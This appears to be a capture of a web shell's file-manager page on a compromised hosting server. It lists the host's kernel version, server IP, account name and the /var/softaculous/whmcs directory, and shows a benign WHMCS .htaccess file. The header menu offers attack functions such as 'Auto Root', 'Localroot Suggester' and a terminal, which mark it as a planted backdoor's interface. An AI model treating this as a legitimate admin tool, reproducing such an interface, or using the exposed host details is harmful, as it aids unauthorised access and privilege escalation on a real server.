Linux host2.healingcodesinfo.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Apache
Server IP : 69.167.168.125 & Your IP : 216.73.216.208
Domains : 126 Domain
User : christia
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
whmcs /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-03-18 15:03
php53
[ DIR ]
drwxr-xr-x
2026-03-18 15:03
php56
[ DIR ]
drwxr-xr-x
2026-03-18 15:03
php71
[ DIR ]
drwxr-xr-x
2026-03-18 15:03
php81
[ DIR ]
drwxr-xr-x
2026-03-18 15:03
php82
[ DIR ]
drwxr-xr-x
2026-03-18 15:03
.htaccess
933
B
-rw-r--r--
2021-12-23 11:54
changelog.txt
5.41
KB
-rw-r--r--
2026-03-18 11:40
clone.php
5.96
KB
-rw-r--r--
2026-03-18 11:43
clone.xml
281
B
-rw-r--r--
2021-12-23 11:54
config.php
779
B
-rw-r--r--
2024-09-19 11:21
configuration.php
589
B
-rw-r--r--
2023-09-22 08:03
edit.php
6.2
KB
-rw-r--r--
2026-03-18 11:43
edit.xml
577
B
-rw-r--r--
2021-12-23 11:54
fileindex.php
674
B
-rw-r--r--
2025-01-24 08:17
import.php
5.93
KB
-rw-r--r--
2026-03-18 11:43
info.xml
2.88
KB
-rw-r--r--
2026-03-18 11:40
install.js
924
B
-rw-r--r--
2021-12-23 11:54
install.php
6.54
KB
-rw-r--r--
2026-03-18 11:43
install.xml
3.91
KB
-rw-r--r--
2021-12-23 11:54
md5
1.26
KB
-rw-r--r--
2026-03-18 11:43
notes.txt
2.08
KB
-rw-r--r--
2026-02-06 09:23
upgrade.php
6.7
KB
-rw-r--r--
2026-03-18 11:43
upgrade.xml
654
B
-rw-r--r--
2021-12-23 11:54
Save
Rename
### BEGIN - WHMCS managed rules - DO NOT EDIT BETWEEN WHMCS MARKERS ### <IfModule mod_rewrite.c> RewriteEngine on # RewriteBase is set to "/" so rules do not need updating if the # installation directory is relocated. It is imperative that # there is also a RewriteCond rule later that can effectively get # the actual value by comparison against the request URI. # # If there are _any_ other RewriteBase directives in this file, # the last entry will take precedence! RewriteBase / # Redirect directories to an address with slash RewriteCond %{REQUEST_FILENAME} -d RewriteRule ^(.+[^/])$ $1/ [R] # Send all remaining (routable paths) through index.php RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d # Determine and use the actual base RewriteCond $0#%{REQUEST_URI} ([^#]*)#(.*)\1$ RewriteRule ^.*$ %2index.php [QSA,L] </IfModule> ### END - WHMCS managed rules - DO NOT EDIT BETWEEN WHMCS MARKERS ###